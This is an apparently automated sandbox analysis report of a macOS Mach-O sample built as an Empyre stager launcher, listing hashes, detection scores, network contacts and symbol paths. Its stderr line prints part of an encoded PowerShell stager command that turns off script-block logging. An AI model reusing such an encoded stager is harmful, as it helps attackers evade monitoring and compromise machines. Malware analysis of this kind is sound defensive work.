Analysis Report SwWPxGBaKt.macho

Overview

General Information

Sample Name:	SwWPxGBaKt.macho
Analysis ID:	538
MD5:	480e81fbccf44939cf4ad4d21f9ba230
SHA1:	ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256:	c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
Infos:
Most interesting Screenshot:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Process executable has a file extension which is uncommon (probably to disguise the executable)

Contains symbols with paths

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: SwWPxGBaKt.macho

Avira: detected

Multi AV Scanner detection for submitted file

Source: SwWPxGBaKt.macho	Virustotal: Detection: 33%			Perma Link
Source: SwWPxGBaKt.macho	ReversingLabs: Detection: 44%

Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmp	String found in binary or memory: https://www.python.org/psf/license/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 443

Source: classification engine

Classification label: mal60.evad.macMACHO@0/0@0/0

Data Obfuscation:

Contains symbols with paths

Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/

Source: submitted sample

Stderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^SyntaxError: invalid syntax: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Process executable has a file extension which is uncommon (probably to disguise the executable)

Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571)

Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.macho

Jump to behavior

Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
17.171.27.65	unknown	United States	714	APPLE-ENGINEERINGUS	false
17.253.109.202	unknown	United States	6185	APPLE-AUSTINUS	false
2.22.90.177	unknown	European Union	20940	AKAMAI-ASN1EU	false

ID:	538
Product:	CloudBasic
Start time:	10:55:14
Start date:	08.04.2021
Sample:	SwWPxGBaKt.macho
Cookbook:	defaultmacfilecookbook.jbs
System description:	Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Architecture:	MAC
MD5:	480e81fbccf44939cf4ad4d21f9ba230
SHA1:	ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256:	c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
Filetype:	Mac OS X Mach-O 64bit Intel executable (20004/1) 100.00%

Analysis Report SwWPxGBaKt.macho

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Screenshots

Network Map

Contacted Public IPs